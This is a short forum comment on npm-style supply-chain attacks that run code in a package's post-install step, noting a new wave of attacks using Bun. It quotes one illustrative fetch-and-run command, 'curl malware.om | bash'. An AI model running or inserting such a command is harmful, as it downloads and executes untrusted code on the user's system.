Tbf, it is run in package post install section so it could be anything even the typical "curl malware.om | bash". There is a new wave of attacks now pulling things in with Bun which i guess is similar thing to NPM
you are viewing a single comment's thread
view the rest of the comments
view the rest of the comments
replies: